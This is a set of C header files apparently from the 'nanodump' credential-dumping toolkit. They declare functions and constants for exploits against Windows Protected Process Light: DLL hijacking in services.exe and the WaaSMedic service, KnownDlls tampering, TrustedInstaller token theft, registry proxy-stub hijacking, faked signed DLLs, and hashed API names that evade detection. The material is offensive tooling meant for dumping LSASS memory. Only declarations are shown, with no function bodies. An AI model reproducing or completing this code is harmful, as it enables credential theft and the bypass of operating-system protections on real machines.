typedef BOOL(WINAPI* WriteFile_t)(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
typedef BOOL(WINAPI* ReadFile_t)(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
typedef BOOL(WINAPI* DisconnectNamedPipe_t)(HANDLE hNamedPipe);

#define InitializeSecurityDescriptor_SW2_HASH                         0x0388211D
#define ConvertStringSecurityDescriptorToSecurityDescriptorW_SW2_HASH 0x1693E886
#define CreateNamedPipeW_SW2_HASH                                     0x58993B44
#define CreateFileW_SW2_HASH                                          0x24976EA4
#define ConnectNamedPipe_SW2_HASH                                     0x96019466
#define WriteFile_SW2_HASH                                            0xED7C1B6F
#define ReadFile_SW2_HASH                                             0x8D38978F
#define DisconnectNamedPipe_SW2_HASH                                  0xAEA47AEA

#define SDDL_REVISION_1 1
#define PAGE_SIZE 0x1000

typedef enum MESSAGE_TYPE
{
    msg_type_parameters,
    msg_type_result,
} MESSAGE_TYPE;

typedef struct _MSG_PPL_MEDIC_PARAMETERS
{
    LPSTR dump_path[MAX_PATH + 1];
    BOOL  use_valid_sig;
    BOOL  elevate_handle;
} MSG_PPL_MEDIC_PARAMETERS, * PMSG_PPL_MEDIC_PARAMETERS;

typedef struct _MSG_RESULT
{
	BOOL succeded;
} MSG_RESULT, * PMSG_RESULT;

typedef struct _IPC_MSG
{
    MESSAGE_TYPE Type;
    union {
        MSG_RESULT Result;
        MSG_PPL_MEDIC_PARAMETERS Params;
    } p;

} IPC_MSG, * PIPC_MSG;

#if defined(PPL_MEDIC)

#define IPC_PIPE_NAME L"NanoDumpPPLmedicPipe"

#elif defined(SSP)

#define IPC_PIPE_NAME L"NanoDumpSSPPipe"

#endif // #if defined(PPL_MEDIC)

BOOL server_create_named_pipe(
    IN LPCWSTR pipe_name,
    IN BOOL async,
    OUT PHANDLE hPipe);

BOOL client_connect_to_named_pipe(
    IN LPWSTR pipe_name,
    OUT PHANDLE hPipe);

BOOL server_listen_on_named_pipe(
    IN HANDLE hPipe);

BOOL server_recv_arguments_from_pipe(
    IN HANDLE hPipe,
    OUT LPSTR* dump_path,
    OUT PBOOL use_valid_sig,
    OUT PBOOL elevate_handle);

BOOL client_send_arguments_from_pipe(
    IN HANDLE hPipe,
    IN LPSTR dump_path,
    IN BOOL use_valid_sig,
    IN BOOL elevate_handle);

BOOL server_disconnect_pipe(
    IN HANDLE hPipe);

BOOL write_data_to_pipe(
    IN HANDLE hPipe,
    IN PVOID data_bytes,
    IN DWORD data_size);

BOOL server_send_success(
    IN HANDLE hPipe,
    IN BOOL succeded);

BOOL client_recv_success(
    IN HANDLE hPipe,
    OUT PBOOL succeded);

#endif // #if defined(PPL_MEDIC) || defined(SSP)


================================================
FILE: Creds-BOF/nanodump/include/ppl/cleanup.h
================================================
#pragma once

#include <windows.h>
#include <winternl.h>

#include "nanodump.h"
#include "dinvoke.h"

typedef BOOL(WINAPI* SetKernelObjectSecurity_t) (HANDLE Handle, SECURITY_INFORMATION SecurityInformation, PSECURITY_DESCRIPTOR SecurityDescriptor);
typedef BOOL(WINAPI* InitializeSecurityDescriptor_t) (PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD dwRevision);
typedef BOOL(WINAPI* SetSecurityDescriptorDacl_t) (PSECURITY_DESCRIPTOR pSecurityDescriptor, BOOL bDaclPresent, PACL pDacl, BOOL bDaclDefaulted);

#define SetKernelObjectSecurity_SW2_HASH 0x06AE0E20
#define InitializeSecurityDescriptor_SW2_HASH 0x0388211D
#define SetSecurityDescriptorDacl_SW2_HASH 0x7BDD4356

BOOL get_current_dll_filename(
	OUT LPCWSTR* ppwszDllName);

BOOL delete_known_dll_entry(VOID);


================================================
FILE: Creds-BOF/nanodump/include/ppl/ppl.h
================================================
#pragma once


================================================
FILE: Creds-BOF/nanodump/include/ppl/ppl_dump.h
================================================
#pragma once

#include <windows.h>
#include <winternl.h>
#include <string.h>
#include <memory.h>
#include <aclapi.h>

#include "nanodump.h"
#include "utils.h"
#include "dinvoke.h"
#include "syscalls.h"
#include "token_priv.h"
#include "impersonate.h"
#include "ppl/ppl_utils.h"

#define PPL_BINARY L"services.exe"
#define DLL_TO_HIJACK_WIN63 L"SspiCli.dll"
#define DLL_TO_HIJACK_WIN10 L"EventAggregation.dll"
#define DLL_LINK_TARGET L"foobar"

typedef BOOL(WINAPI* DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
typedef BOOL(WINAPI* CopySid_t) (DWORD nDestinationSidLength, PSID pDestinationSid, PSID pSourceSid);
typedef BOOL(WINAPI* ConvertSidToStringSidW_t) (PSID Sid, LPWSTR *StringSid);
typedef BOOL(WINAPI* ConvertStringSidToSidW_t) (LPCWSTR StringSid, PSID *Sid);
typedef BOOL(WINAPI* LookupAccountSidW_t) (LPCWSTR lpSystemName, PSID Sid, LPWSTR Name, LPDWORD cchName, LPWSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse);
typedef BOOL(WINAPI* InitializeSecurityDescriptor_t) (PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD dwRevision);
typedef BOOL(WINAPI* SetSecurityDescriptorDacl_t) (PSECURITY_DESCRIPTOR pSecurityDescriptor, BOOL bDaclPresent, PACL pDacl, BOOL bDaclDefaulted);
typedef BOOL(WINAPI* SetKernelObjectSecurity_t) (HANDLE Handle, SECURITY_INFORMATION SecurityInformation, PSECURITY_DESCRIPTOR SecurityDescriptor);
typedef BOOL(WINAPI* RevertToSelf_t) (VOID);
typedef BOOL(WINAPI* DefineDosDeviceW_t) (DWORD dwFlags, LPCWSTR lpDeviceName, LPCWSTR lpTargetPath);
typedef BOOL(WINAPI* CreateProcessAsUserW_t) (HANDLE hToken, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
typedef HANDLE(WINAPI* CreateFileTransactedW_t) (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile, HANDLE hTransaction, PUSHORT pusMiniVersion, PVOID lpExtendedParameter);
typedef DWORD(WINAPI* GetSecurityInfo_t) (HANDLE handle, SE_OBJECT_TYPE ObjectType, SECURITY_INFORMATION SecurityInfo, PSID* ppsidOwner, PSID* ppsidGroup, PACL* ppDacl, PACL* ppSacl, PSECURITY_DESCRIPTOR* ppSecurityDescriptor);
typedef UINT(WINAPI* GetSystemDirectoryW_t) (LPWSTR lpBuffer, UINT uSize);
typedef BOOL(WINAPI* FindClose_t) (HANDLE hFindFile);
typedef HANDLE(WINAPI* FindFirstFileW_t) (LPCWSTR lpFileName, LPWIN32_FIND_DATAW lpFindFileData);
typedef BOOL(WINAPI* FindNextFileW_t) (HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData);

#define CopySid_SW2_HASH 0xE9DEE47F
#define ConvertSidToStringSidW_SW2_HASH 0x2E89B34F
#define ConvertStringSidToSidW_SW2_HASH 0x9A0697A4
#define LookupAccountSidW_SW2_HASH 0x093E752B
#define InitializeSecurityDescriptor_SW2_HASH 0x0388211D
#define SetSecurityDescriptorDacl_SW2_HASH 0x7BDD4356
#define SetKernelObjectSecurity_SW2_HASH 0x06AE0E20
#define RevertToSelf_SW2_HASH 0x93BC9622
#define DefineDosDeviceW_SW2_HASH 0xCB970704
#define CreateProcessAsUserW_SW2_HASH 0x33A5532B
#define CreateFileTransactedW_SW2_HASH 0x968D0D41
#define GetSecurityInfo_SW2_HASH 0x7D3F55E4
#define FindClose_SW2_HASH 0xD2503ADD
#define GetSystemDirectoryW_SW2_HASH 0x008D32E6
#define FindFirstFileW_SW2_HASH 0x8EDA41FA
#define FindNextFileW_SW2_HASH 0xBF0C31DB

BOOL run_ppl_dump_exploit(
    IN unsigned char nanodump_ppl_dump_dll[],
    IN unsigned int nanodump_ppl_dump_dll_len,
    IN LPCSTR dump_path,
    IN BOOL use_valid_sig,
    IN BOOL duplicate_handle);

BOOL create_protected_process_as_user(
    IN HANDLE hToken,
    IN LPWSTR pwszCommandLine,
    OUT PHANDLE phProcess);

BOOL prepare_ppl_command_line(
    IN LPCSTR dump_path,
    IN BOOL use_valid_sig,
    IN BOOL duplicate_handle,
    OUT LPWSTR* command_line);

BOOL find_file_for_transaction(
    IN DWORD dwMinSize,
    OUT LPWSTR* ppwszFilePath);

BOOL write_payload_dll_transacted(
    IN unsigned char nanodump_ppl_dump_dll[],
    IN unsigned int nanodump_ppl_dump_dll_len,
    OUT PHANDLE pdhFile,
    OUT PHANDLE phTransaction);

BOOL map_dll(
    IN unsigned char nanodump_ppl_dump_dll[],
    IN unsigned int nanodump_ppl_dump_dll_len,
    IN LPWSTR pwszSectionName,
    OUT PHANDLE phSection,
    OUT PHANDLE phTransaction);

BOOL check_ppl_requirements(VOID);

BOOL get_hijackeable_dllname(
    OUT LPWSTR* ppwszDllName);


================================================
FILE: Creds-BOF/nanodump/include/ppl/ppl_medic.h
================================================
#pragma once

#include "impersonate.h"
#include "token_priv.h"
#include "dinvoke.h"
#include "handle.h"

#define TH32CS_SNAPTHREAD 0x00000004

typedef struct tagTHREADENTRY32 {
  DWORD dwSize;
  DWORD cntUsage;
  DWORD th32ThreadID;
  DWORD th32OwnerProcessID;
  LONG  tpBasePri;
  LONG  tpDeltaPri;
  DWORD dwFlags;
} THREADENTRY32, *LPTHREADENTRY32;

typedef struct _FILE_LIST {
  WCHAR FileName[MAX_PATH + 1];
  BOOL  Existed;
  struct _FILE_LIST* Next;
} FILE_LIST, *PFILE_LIST;

typedef ULONGLONG(WINAPI* GetTickCount64_t) ();
typedef SC_HANDLE(WINAPI* OpenSCManagerW_t)(LPCWSTR lpMachineName, LPCWSTR lpDatabaseName, DWORD dwDesiredAccess);
typedef SC_HANDLE(WINAPI* OpenServiceW_t)(SC_HANDLE hSCManager, LPCWSTR lpServiceName, DWORD dwDesiredAccess);
typedef BOOL(WINAPI* CloseServiceHandle_t)(SC_HANDLE hSCObject);
typedef HRESULT(WINAPI* LoadTypeLib_t)(LPCOLESTR szFile, ITypeLib **pptlib);
typedef HRESULT(WINAPI* CreateTypeLib2_t)(SYSKIND syskind, LPCOLESTR szFile, ICreateTypeLib2 **ppctlib);
typedef BSTR(WINAPI* SysAllocString_t)(const OLECHAR *psz);
typedef VOID(WINAPI* SysFreeString_t)(BSTR bstrString);
typedef HANDLE(WINAPI* CreateToolhelp32Snapshot_t)(DWORD dwFlags, DWORD th32ProcessID);
typedef BOOL(WINAPI* Thread32First_t)(HANDLE hSnapshot, LPTHREADENTRY32 lpte);
typedef BOOL(WINAPI* Thread32Next_t)(HANDLE hSnapshot, LPTHREADENTRY32 lpte);
typedef HANDLE(WINAPI* CreateFileTransactedW_t)(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile, HANDLE hTransaction, PUSHORT pusMiniVersion, PVOID lpExtendedParameter);
typedef HANDLE(WINAPI* FindFirstFileW_t)(LPCWSTR lpFileName,LPWIN32_FIND_DATAW lpFindFileData);
typedef BOOL(WINAPI* FindNextFileW_t)(HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData);
typedef BOOL(WINAPI* FindClose_t)(HANDLE hFindFile);
typedef UINT(WINAPI* GetSystemDirectoryW_t)(LPWSTR lpBuffer, UINT uSize);
typedef UINT(WINAPI* GetWindowsDirectoryW_t)(LPWSTR lpBuffer, UINT uSize);
typedef DWORD(WINAPI* GetFileAttributesW_t)(LPCWSTR lpFileName);
typedef HANDLE(WINAPI* CreateEventW_t)(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCWSTR lpName);
typedef BOOL(WINAPI* DeleteFileW_t)(LPCWSTR lpFileName);
typedef BOOL(WINAPI* LockFile_t)(HANDLE hFile, DWORD dwFileOffsetLow, DWORD dwFileOffsetHigh, DWORD nNumberOfBytesToLockLow, DWORD nNumberOfBytesToLockHigh);
typedef BOOL(WINAPI* UnlockFile_t)(HANDLE hFile, DWORD dwFileOffsetLow, DWORD dwFileOffsetHigh, DWORD nNumberOfBytesToUnlockLow, DWORD nNumberOfBytesToUnlockHigh);

#define GetTickCount64_SW2_HASH           0x5DA9A282
#define OpenSCManagerW_SW2_HASH           0x10B0D71C
#define OpenServiceW_SW2_HASH             0x29B5ED2E
#define CloseServiceHandle_SW2_HASH       0x2D916B4A
#define LoadTypeLib_SW2_HASH              0x689C94C2
#define CreateTypeLib2_SW2_HASH           0xE6DF4E21
#define SysAllocString_SW2_HASH           0x1819D63C
#define SysFreeString_SW2_HASH            0xFF68F5F9
#define CreateToolhelp32Snapshot_SW2_HASH 0x0E90CBC0
#define Thread32First_SW2_HASH            0x7C990674
#define Thread32Next_SW2_HASH             0x42ED312A
#define FindFirstFileW_SW2_HASH           0x8EDA41FA
#define FindNextFileW_SW2_HASH            0xBF0C31DB
#define FindClose_SW2_HASH                0xD2503ADD
#define CreateFileTransactedW_SW2_HASH    0x968D0D41
#define GetSystemDirectoryW_SW2_HASH      0x008D32E6
#define GetWindowsDirectoryW_SW2_HASH     0xE668D186
#define GetFileAttributesW_SW2_HASH       0x70EEEEDF
#define CreateEventW_SW2_HASH             0x1C8569AF
#define DeleteFileW_SW2_HASH              0x40DA6544
#define LockFile_SW2_HASH                 0x6D347D89
#define UnlockFile_SW2_HASH               0x3E214ABE

#define VERSION_MAJOR                           0                                       // Major version of the tool
#define VERSION_MINOR                           1                                       // Minor version of the tool
#define PAGE_SIZE                               0x1000                                  // Default size for memory allocations
#define LARGE_BUFFER_SIZE                       (256 * 1024 * 1024)                     // Default size for large memory allocations
#define TIMEOUT                                 5000                                    // Default timeout for wait operations
#define MAX_ATTEMPTS                            1000                                    // Default maximum number of attempts for the memory write exploit

#define SERVICES_ACTIVE_DATABASEA "ServicesActive"
#define SERVICES_ACTIVE_DATABASEW L"ServicesActive"


#define STR_KNOWNDLLS                           L"\\KnownDlls"                          // Path of the \KnownDlls object directory
#define STR_MOD_NTDLL                           L"ntdll"                                // Name of the 'ntdll.dll' module
#define STR_MOD_COMBASE                         L"combase"                              // Name of the 'combase.dll' module
#define STR_PROC_NTIMPERSONATETHREAD            "NtImpersonateThread"                   // Syscall for impersonating a thread's Token
#define STR_PROC_NTCREATESECTION                "NtCreateSection"                       // Syscall for creating a Section object
#define STR_PROC_LDRGETKNOWNDLLSECTIONHANDLE    "LdrGetKnownDllSectionHandle"           // Name of the global variable (in 'ntdll') that holds the value of the \KnownDlls directory
#define STR_TI_SVC                              L"TrustedInstaller"                     // Name of the TrustedInstaller identity
#define STR_WAASMEDIC_SVC                       L"WaaSMedicSvc"                         // Name of the Windows Update Medic service
#define STR_WAASMEDIC_CAPSULE                   L"WaaSMedicCapsule.dll"                 // Name of the Windows Update Medic service's capsule plugin module
#define STR_WAASMEDIC_TYPELIB                   L"WaaSMedicPS.dll"                      // Name of the Windows Update Medic service's Proxy/Stub module
#define STR_WAASMEDIC_TYPELIB_DEFAULT           L"%SystemRoot%\\system32\\WaaSMedicPS.dll" // Default path of the Windows Update Medic service's Proxy/Stub module
#define STR_TASKSCHD_TYPELIB_DEFAULT            L"TaskSchdPS.dll"                       // Name of the Task Scheduler's Proxy/Stub module
#define STR_METHOD_LAUNCHDETECTIONONLY          L"LaunchDetectionOnly"                  // Name of the WaaSRemediationAgent's fist method
#define STR_METHOD_LAUNCHREMEDIATIONONLY        L"LaunchRemediationOnly"                // Name of the WaaSRemediationAgent's second method
#define STR_BASENAMEDOBJECTS                    L"BaseNamedObjects"                     // Name of the \BaseNamedObjets object directory
#define STR_HIJACKED_DLL_NAME                   L"WaaSMedicPayload.dll"                 // Name of a non-existent module
#define STR_IPC_WAASMEDIC_LOAD_EVENT_NAME       L"WaaSMedicLoadEvent"                   // Name of an event used for synchronization between the tool and DLL injected in WaaSMedicSvc
#define STR_IPC_WERFAULT_LOAD_EVENT_NAME        L"WerFaultLoadEvent"                    // Name of an event used for synchronization between the tool and DLL injected in WerFaultSecure.exe
#define STR_IPC_PIPE_NAME                       L"PPLmedicPipe"                         // Name of the named pipe used to communicate with processes in which the payload DLL is injected
#define STR_DUMMY_PIPE_NAME                     L"WaaSMedicLogonSessionPipe"            // Name of the named pipe used to retrieve the initial logon session token of LOCAL SYSTEM
#define STR_SIGNED_SYSTEM_DLL                   L"dbghelp.dll"                          // Name of a legitimate system DLL used to create a fake cached signed DLL
#define STR_CACHE_SIGNED_DLL_NAME               L"faultrep.dll"                         // Name of a DLL to cache sign and hijack in a protected process
#define STR_SIGNED_EXE_NAME                     L"WerFaultSecure.exe"                   // Name of a signed executable we can start with the protection level WinTcb

#define STR_PROTECTION_LEVEL_WINTCB_LIGHT       L"PsProtectedSignerWinTcb-Light"        // PPL WinTcb
#define STR_PROTECTION_LEVEL_WINDOWS            L"PsProtectedSignerWindows"             // PP  Windows
#define STR_PROTECTION_LEVEL_WINDOWS_LIGHT      L"PsProtectedSignerWindows-Light"       // PPL Windows
#define STR_PROTECTION_LEVEL_ANTIMALWARE_LIGHT  L"PsProtectedSignerAntimalware-Light"   // PPL Antimalware
#define STR_PROTECTION_LEVEL_LSA_LIGHT          L"PsProtectedSignerLsa-Light"           // PPL Lsa
#define STR_PROTECTION_LEVEL_WINTCB             L"PsProtectedSignerWinTcb"              // PP  WinTcb
#define STR_PROTECTION_LEVEL_CODEGEN_LIGHT      L"PsProtectedSignerCodegen-Light"       // PPL Codegen
#define STR_PROTECTION_LEVEL_AUTHENTICODE       L"PsProtectedSignerAuthenticode"        // PP  Authenticode
#define STR_PROTECTION_LEVEL_PPL_APP            L"PsProtectedSignerApp-Light"           // PPL App
#define STR_PROTECTION_LEVEL_NONE               L"None"                                 // None

#define STR_SE_SIGNING_LEVEL_UNCHECKED          L"Unchecked"                            // 0x00000000
#define STR_SE_SIGNING_LEVEL_UNSIGNED           L"Unsigned"                             // 0x00000001
#define STR_SE_SIGNING_LEVEL_ENTERPRISE         L"Enterprise"                           // 0x00000002
#define STR_SE_SIGNING_LEVEL_DEVELOPER          L"Developer"                            // 0x00000003 (Custom1)
#define STR_SE_SIGNING_LEVEL_AUTHENTICODE       L"Authenticode"                         // 0x00000004
#define STR_SE_SIGNING_LEVEL_CUSTOM_2           L"Custom2"                              // 0x00000005
#define STR_SE_SIGNING_LEVEL_STORE              L"Store"                                // 0x00000006
#define STR_SE_SIGNING_LEVEL_ANTIMALWARE        L"Antimalware"                          // 0x00000007 (Custom3)
#define STR_SE_SIGNING_LEVEL_MICROSOFT          L"Microsoft"                            // 0x00000008
#define STR_SE_SIGNING_LEVEL_CUSTOM_4           L"Custom4"                              // 0x00000009
#define STR_SE_SIGNING_LEVEL_CUSTOM_5           L"Custom5"                              // 0x0000000A
#define STR_SE_SIGNING_LEVEL_DYNAMIC_CODEGEN    L"DynamicCodegen"                       // 0x0000000B
#define STR_SE_SIGNING_LEVEL_WINDOWS            L"Windows"                              // 0x0000000C
#define STR_SE_SIGNING_LEVEL_CUSTOM_7           L"Custom7"                              // 0x0000000D
#define STR_SE_SIGNING_LEVEL_WINDOWS_TCB        L"WindowsTcb"                           // 0x0000000E
#define STR_SE_SIGNING_LEVEL_CUSTOM_6           L"Custom6"                              // 0x0000000F
#define STR_SE_SIGNING_LEVEL_UNKNOWN            L"Unknown"

#define ITypeLib_GetLibAttr(This,ppTLibAttr) (This)->lpVtbl->GetLibAttr(This,ppTLibAttr)
#define ICreateTypeLib2_SetGuid(This,guid) (This)->lpVtbl->SetGuid(This,guid)
#define ICreateTypeLib2_SetLcid(This,lcid) ( (This)->lpVtbl->SetLcid(This,lcid) ) 
#define ICreateTypeLib2_SetVersion(This,wMajorVerNum,wMinorVerNum) ( (This)->lpVtbl->SetVersion(This,wMajorVerNum,wMinorVerNum) ) 
#define ITypeLib_GetTypeInfoOfGuid(This,guid,ppTinfo) ( (This)->lpVtbl->GetTypeInfoOfGuid(This,guid,ppTinfo) ) 
#define ITypeInfo_GetTypeAttr(This,ppTypeAttr) ( (This)->lpVtbl -> GetTypeAttr(This,ppTypeAttr) ) 
#define ITypeInfo_GetDocumentation(This,memid,pBstrName,pBstrDocString,pdwHelpContext,pBstrHelpFile) ( (This)->lpVtbl -> GetDocumentation(This,memid,pBstrName,pBstrDocString,pdwHelpContext,pBstrHelpFile) ) 
#define ICreateTypeLib2_CreateTypeInfo(This,szName,tkind,ppCTInfo) ( (This)->lpVtbl -> CreateTypeInfo(This,szName,tkind,ppCTInfo) ) 
#define ICreateTypeInfo_SetTypeFlags(This,uTypeFlags) ( (This)->lpVtbl -> SetTypeFlags(This,uTypeFlags) ) 
#define ICreateTypeInfo_SetGuid(This,guid) ( (This)->lpVtbl -> SetGuid(This,guid) ) 
#define ICreateTypeInfo_SetVersion(This,wMajorVerNum,wMinorVerNum) ( (This)->lpVtbl -> SetVersion(This,wMajorVerNum,wMinorVerNum) ) 
#define ITypeInfo_GetRefTypeOfImplType(This,index,pRefType) ( (This)->lpVtbl -> GetRefTypeOfImplType(This,index,pRefType) ) 
#define ITypeInfo_GetRefTypeInfo(This,hRefType,ppTInfo) ( (This)->lpVtbl -> GetRefTypeInfo(This,hRefType,ppTInfo) ) 
#define ICreateTypeInfo_AddRefTypeInfo(This,pTInfo,phRefType) ( (This)->lpVtbl -> AddRefTypeInfo(This,pTInfo,phRefType) ) 
#define ICreateTypeInfo_AddImplType(This,index,hRefType) ( (This)->lpVtbl -> AddImplType(This,index,hRefType) )
#define ITypeInfo_GetFuncDesc(This,index,ppFuncDesc) ( (This)->lpVtbl -> GetFuncDesc(This,index,ppFuncDesc) ) 
#define ITypeInfo_ReleaseFuncDesc(This,pFuncDesc) ( (This)->lpVtbl -> ReleaseFuncDesc(This,pFuncDesc) ) 
#define ITypeInfo_GetNames(This,memid,rgBstrNames,cMaxNames,pcNames) ( (This)->lpVtbl -> GetNames(This,memid,rgBstrNames,cMaxNames,pcNames) ) 
#define ICreateTypeInfo_AddFuncDesc(This,index,pFuncDesc) ( (This)->lpVtbl -> AddFuncDesc(This,index,pFuncDesc) ) 
#define ICreateTypeInfo_SetFuncAndParamNames(This,index,rgszNames,cNames) ( (This)->lpVtbl -> SetFuncAndParamNames(This,index,rgszNames,cNames) ) 
#define ITypeInfo_ReleaseTypeAttr(This,pTypeAttr) ( (This)->lpVtbl -> ReleaseTypeAttr(This,pTypeAttr) ) 
#define ICreateTypeLib2_SaveAllChanges(This) ( (This)->lpVtbl -> SaveAllChanges(This) ) 
#define ITypeLib_ReleaseTLibAttr(This,pTLibAttr) ( (This)->lpVtbl -> ReleaseTLibAttr(This,pTLibAttr) ) 

// WaaSRemediationAgent - 72566E27-1ABB-4EB3-B4F0-EB431CB1CB32
#define CLSID_WAASREMEDIATION   { 0x72566e27, 0x1abb, 0x4eb3, { 0xb4, 0xf0, 0xeb, 0x43, 0x1c, 0xb1, 0xcb, 0x32 } }
// IWaaSRemediationEx - B4C1D279-966E-44E9-A9C5-CCAF4A77023D
#define IID_WAASREMEDIATIONEX   { 0xb4c1d279, 0x966e, 0x44e9, { 0xa9, 0xc5, 0xcc, 0xaf, 0x4a, 0x77, 0x02, 0x3d } }
// ITaskHandler - 839D7762-5121-4009-9234-4F0D19394F04
#define IID_TASKHANDLER         { 0x839d7762, 0x5121, 0x4009, { 0x92, 0x34, 0x4f, 0x0d, 0x19, 0x39, 0x4f, 0x04 } }

#define NtGetCurrentProcess() ( ( HANDLE ) ( LONG_PTR ) - 1 )
#define NtGetCurrentThread() ( ( HANDLE ) ( LONG_PTR ) - 2 )

BOOL run_ppl_medic_exploit(
    IN unsigned char nanodump_ppl_medic_dll[],
    IN unsigned int nanodump_ppl_medic_dll_len,
    IN LPSTR dump_path,
    IN BOOL use_valid_sig,
    IN BOOL elevate_handle);

BOOL restart_waa_s_medic_svc();

BOOL find_waa_s_medic_svc_base_named_objects_handle(OUT PHANDLE BaseNamedObjectsHandle);

BOOL find_saa_s_medic_svc_pid(
    IN LPDWORD Pid);

BOOL write_type_lib(
    IN LPWSTR TypeLibPath);

BOOL modify_type_lib_registry_value(
    IN LPWSTR TypeLibPath,
    IN LPWSTR TypeLibRegValuePath,
    IN HANDLE hTI,
    OUT PBOOL StateRegTypeLibModified);

BOOL get_type_lib_orig_path(
    IN LPWSTR TypeRegValuePath,
    OUT LPWSTR* TypeLibOrigPath);

BOOL get_trusted_installer_token(
    OUT PHANDLE hTI);

BOOL map_payload_dll(
    IN unsigned char nanodump_ppl_medic_dll[],
    IN unsigned int nanodump_ppl_medic_dll_len,
    IN LPWSTR HijackedDllName,
    IN LPWSTR HijackedDllSectionPath,
    OUT LPWSTR* HollowedDllPath,
    OUT PHANDLE DllSectionHandle);

BOOL get_proxy_stub_orig_path(
    IN LPWSTR ProxyStubRegValuePath,
    OUT LPWSTR* ProxyStubOrigPath);

BOOL create_dummy_dll_file(
    IN LPWSTR HijackedDllName,
    OUT PHANDLE DummyDllFileHandle);

BOOL find_proxy_stub_registry_value_path(
    OUT LPWSTR* ProxyStubRegistryValuePath);

BOOL modify_proxy_stub_registry_value(
    IN HANDLE hTI,
    IN LPWSTR ProxyStubRegValuePath,
    IN LPWSTR HijackedDllName,
    OUT PBOOL StateRegProxyStubModified);

BOOL get_waa_s_medic_capsule_path(
    IN LPWSTR* WaaSMedicCapsulePath);

BOOL lock_plugin_dll(
    IN LPWSTR WaaSMedicCapsulePath,
    IN OUT PBOOL StatePluginDllLocked,
    OUT PHANDLE WaaSMedicCapsuleHandle);

BOOL enumerate_temporary_directories(
    OUT PFILE_LIST* pfile_list);

BOOL is_proxy_stub_dll_loaded(
    IN HANDLE ProxyStubDllLoadEventHandle);

BOOL cleanup_temp_directories(
    IN PFILE_LIST TemporaryDiretoriesBefore,
    IN PFILE_LIST TemporaryDiretoriesAfter);

VOID free_directory_list(
    IN PFILE_LIST head);

BOOL unlock_plugin_dll(
    IN HANDLE WaaSMedicCapsuleHandle);

BOOL delete_type_lib(
    IN LPWSTR TypeLibPath);

BOOL create_load_event(
    IN LPWSTR event_name,
    OUT PHANDLE ProxyStubDllLoadEventHandle);


================================================
FILE: Creds-BOF/nanodump/include/ppl/ppl_medic_client.h
================================================
#pragma once

//#include <comdef.h>
#include <oaidl.h>
#include <objbase.h>

#include "dinvoke.h"
#include "ppl/ppl_medic.h"
#include "ppl/ppl_utils.h"

#define CLSID_WAASREMEDIATION   { 0x72566e27, 0x1abb, 0x4eb3, { 0xb4, 0xf0, 0xeb, 0x43, 0x1c, 0xb1, 0xcb, 0x32 } } // WaaSRemediationAgent - 72566E27-1ABB-4EB3-B4F0-EB431CB1CB32
#define IID_WAASREMEDIATIONEX   { 0xb4c1d279, 0x966e, 0x44e9, { 0xa9, 0xc5, 0xcc, 0xaf, 0x4a, 0x77, 0x02, 0x3d } } // IWaaSRemediationEx - B4C1D279-966E-44E9-A9C5-CCAF4A77023D
#define IID_TASKHANDLER         { 0x839d7762, 0x5121, 0x4009, { 0x92, 0x34, 0x4f, 0x0d, 0x19, 0x39, 0x4f, 0x04 } } // ITaskHandler - 839D7762-5121-4009-9234-4F0D19394F04
#define IID_ALL_ZERO            { 0x0, 0x0, 0x0, { 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 } }

#define EXPLOIT_STRATEGY_EXTRACT_BYTE_AT_INDEX_0 0
#define EXPLOIT_STRATEGY_EXTRACT_BYTE_AT_INDEX_1 1
#define EXPLOIT_STRATEGY_EXTRACT_BYTE_AT_INDEX_2 2

typedef HRESULT(WINAPI* CoCancelCall_t)(DWORD dwThreadId, ULONG ulTimeout);
typedef HRESULT(WINAPI* CoInitializeEx_t)(LPVOID pvReserved, DWORD dwCoInit);
typedef HRESULT(WINAPI* CoCreateInstance_t)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv);
typedef HRESULT(WINAPI* CoEnableCallCancellation_t)(LPVOID pReserved);
typedef VOID   (WINAPI* CoUninitialize_t)();
typedef HRESULT(WINAPI* CoDisableCallCancellation_t)(LPVOID pReserved);
typedef HANDLE(WINAPI* CreateThread_t)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
typedef DWORD(WINAPI* WaitForSingleObject_t)(HANDLE hHandle, DWORD dwMilliseconds);
typedef BOOL(WINAPI* GetExitCodeThread_t)(HANDLE hThread, LPDWORD lpExitCode);
typedef HMODULE(WINAPI* LoadLibraryW_t)(LPCWSTR lpLibFileName);

#define CoCancelCall_SW2_HASH              0x058CEE0B
#define CoInitializeEx_SW2_HASH            0xEC4E1F34
#define CoCreateInstance_SW2_HASH          0xEEDC39EE
#define CoEnableCallCancellation_SW2_HASH  0xCF44EFD2
#define CoUninitialize_SW2_HASH            0xEF38CFFF
#define CoDisableCallCancellation_SW2_HASH 0x0E54ED00
#define CreateThread_SW2_HASH              0x2C912627
#define WaitForSingleObject_SW2_HASH       0x9E8B4EA7
